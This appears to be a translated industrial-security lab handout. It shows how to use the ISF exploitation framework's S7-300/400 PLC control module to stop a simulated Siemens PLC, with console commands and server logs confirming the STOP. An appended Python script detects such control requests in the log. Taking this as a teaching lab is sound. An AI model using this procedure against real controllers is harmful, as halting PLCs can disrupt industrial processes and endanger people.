Industrial Internet Security Testing Technology: Application Testing.docx

Uploaded by: 太**  Document ID: 86641228  Upload date: 2023-04-14  Format: DOCX  Pages: 12  Size: 129.08 KB

System 2 Application Testing: Lab Document

Experiment principle

This experiment uses the ISF industrial control exploitation framework and the vulnerability exercised by s7_300_400_plc_control, a script that starts and stops S7-300/400 PLCs. ISF (Industrial Exploitation Framework) is a Python-based industrial control exploitation framework similar to Metasploit; its Exploit modules include exploit modules for some of the more widely used industrial control protocols.

Experiment purpose

Using the ISF industrial control exploitation framework and a vulnerability in the S7 protocol, make the S7-300/400 PLC application software stop automatically.

Experiment environment

(1) Attacker machine: Kali Linux virtual machine (provided with the environment)
(2) Target machine: win10 (provided with the environment)

Recommended class hours: 2

Experiment steps

Step 1: Start and configure the serverdemo application

(1) On win10, start the serverdemo industrial software, as shown in Figure 1 below:

[Figure 1]

Open the interface of the serverdemo application, as shown in Figure 2 below:

[Figure 2: Snap7 Server Demo window (Windows platform, 32 bit, Lazarus)]

[Figure 3: Querying the IP address. ipconfig output; it includes IPv4 address 10.133.148.102, subnet mask 255.255.128.0, default gateway 10.133.255.254]

(4) After opening the serverdemo application, configure it, that is, set its IP address to the IP address of win10, as shown in Figure 4 below:

[Figure 4: Configuring the IP address. Snap7 Server Demo window, server stopped]

Once the IP address is configured, click the start button. The log shows "Server started", meaning the service is running, as shown in Figure 5 below:

[Figure 5: Starting the server. Snap7 Server Demo window, local address 10.133.148.102; log entry "2021-12-09 19:55:04 Server started"; Running Clients: 0]

Step 2: Start and configure the clientdemo application

(1) On win10, start the clientdemo industrial software, as shown in Figure 6 below:

[Figure 6: clientdemo. File Explorer view of the "S7工控模拟器" (S7 ICS simulator) folder, listing 1.md, clientdemo.exe, PartnerDemo.exe, serverdemo.exe and snap7.dll]

Open the clientdemo application and configure the IP address, which is the address of the win10 host, 10.133.148.102, as shown in Figure 7 below:

[Figure 7: Configuring the IP address. Snap7 Client Demo window, not yet connected]

(3) After configuring the IP address, click the Connect button to connect to the serverdemo service, as shown in Figure 8 below:

[Figure 8: Snap7 Client Demo window]

[Figure 9: Connecting to the service]

(6) After the connection to the serverdemo service succeeds, the successful connection can be seen in the serverdemo application, as shown in Figure 10 below:

[Figure 10: Connection succeeded. Snap7 Server Demo window, local address 10.133.148.102; the log shows "Client added", "The client requires a PDU size of 480 bytes" and three "Read SZL request" entries (ID:0x0011, ID:0x001c, ID:0x0131), all at 2021-12-09 19:57:39; Running Clients: 1]

Step 3: Use the ISF framework to exploit the vulnerability and halt the serverdemo application service

(1) Download the ISF framework from GitHub at https://github.com/dark-lbp/isf, change into the isf-master directory, and enter the following command:

    python2.7 isf.py

The result is shown in Figure 11 below:

[Figure 11: Starting isf. Console banner: ICS Exploitation Framework; Dev Team: wenzhe zhu(dark-lbp); Exploits: 8, Scanners: 6, Creds: 14; ICS Exploits: PLC: 7, ICS Switch: 0, Software: 0]

Select s7_300_400_plc_control in the ISF framework by entering the following commands:

    use exploits/plcs/siemens/s7_300_400_plc_control
    show options

The result is shown in Figure 12 below:

[Figure 12: show options. Target options: target, port (current setting 102, "Target Port"). Module options: slot ("CPU slot number."), command ("Command 1:start plc, 2:stop plc.")]

(2) Set the object to attack, that is, the IP address to attack, then enter the run command to carry out the attack. Enter the following

[Figure 13: Configuring parameters. ISF console; legible output: "Running module", "Target is alive", "Sending packet to target", "Stop plc"]

(4) After the attack is started on Kali Linux, the win10 host shows that the service of the serverdemo application has been shut down, as shown in Figure 14 below:

[Figure 14: Attack succeeded. Snap7 Server Demo window, local address 10.133.148.102, Running Clients: 1. Log as recovered from the screenshot:]

    2021-12-09 19:55:04 Server started
    2021-12-09 19:57:39 10.133.148.102 Client added
    2021-12-09 19:57:39 10.133.148.102 The client requires a PDU size of 480 bytes
    2021-12-09 19:57:39 10.133.148.102 Read SZL request, ID:0x0011 INDEX:0x0000 OK
    2021-12-09 19:57:39 10.133.148.102 Read SZL request, ID:0x001c INDEX:0x0000 OK
    2021-12-09 19:57:39 10.133.148.102 Read SZL request, ID:0x0131 INDEX:0x0001 OK
    2021-12-09 19:59:53 10.133.148.102 Client added
    2021-12-09 19:59:53 10.133.148.102 Client disconnected by peer
    2021-12-09 19:59:53 (10.133.148.102) Client added
    2021-12-09 19:59:53 10.133.148.102 The client requires a PDU size of 480 bytes
    2021-12-09 19:59:53 10.133.148.102 CPU Control request:STOP OK
    2021-12-09 19:59:53 10.133.148.102 Client added
    2021-12-09 19:59:53 10.133.148.102 Client disconnected by peer
    2021-12-09 21:14:26 10.133.148.102 Client disconnected by peer
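From the monitoring side, the server log in Figure 14 is where this lab's effect becomes visible: a "CPU Control request:STOP" entry arriving in the same second as the peer's "Client added" event. The following is an added example, not part of the original lab document or of Snap7 or ISF; it assumes the server log has been saved as text in the timestamp / peer / message layout of Figure 14, and the `allowed_peers` allow-list and 5-second window are hypothetical parameters.

```python
import re
from datetime import datetime, timedelta

# Constructed sample in the layout of the Figure 14 log: timestamp, peer, message.
SAMPLE_LOG = """\
2021-12-09 19:55:04 Server started
2021-12-09 19:57:39 10.133.148.102 Client added
2021-12-09 19:57:39 10.133.148.102 Read SZL request, ID:0x0011 INDEX:0x0000 OK
2021-12-09 19:59:53 (10.133.148.102) Client added
2021-12-09 19:59:53 10.133.148.102 The client requires a PDU size of 480 bytes
2021-12-09 19:59:53 10.133.148.102 CPU Control request:STOP OK
2021-12-09 19:59:53 10.133.148.102 Client disconnected by peer
"""

LINE = re.compile(  # peer address may be bare, bracketed or parenthesised
    r"^(\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2})\s+[\[(]?(\d+(?:\.\d+){3})[\])]?\s+(.+)$")
CONTROL = re.compile(r"CPU Control request\s*:\s*(\w+)", re.IGNORECASE)

def parse(log_text):
    """Yield (timestamp, peer, message) for each log line that names a peer."""
    for raw in log_text.splitlines():
        m = LINE.match(raw.strip())
        if m:
            yield datetime.strptime(m[1], "%Y-%m-%d %H:%M:%S"), m[2], m[3]

def find_cpu_control(log_text, allowed_peers=(), window=timedelta(seconds=5)):
    """Return one alert per CPU control request (start/stop) found in the log.
    "scripted" is True when the request arrived within `window` of the peer's
    latest "Client added" event; "severity" is "high" unless the peer is on the
    hypothetical allow-list of authorised engineering stations.
    """
    last_added, alerts = {}, []
    for ts, peer, msg in parse(log_text):
        if msg.startswith("Client added"):
            last_added[peer] = ts
            continue
        m = CONTROL.search(msg)
        if m:
            delay = ts - last_added[peer] if peer in last_added else None
            alerts.append({
                "time": ts, "peer": peer, "command": m[1].upper(),
                "scripted": delay is not None and delay <= window,
                "severity": "low" if peer in allowed_peers else "high",
            })
    return alerts

if __name__ == "__main__":
    for alert in find_cpu_control(SAMPLE_LOG):
        print(alert)
```

Normal engineering sessions in the same log (the 19:57:39 entries) only read SZL data, which is why the control request alone, rather than any connection, is what the function reports.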
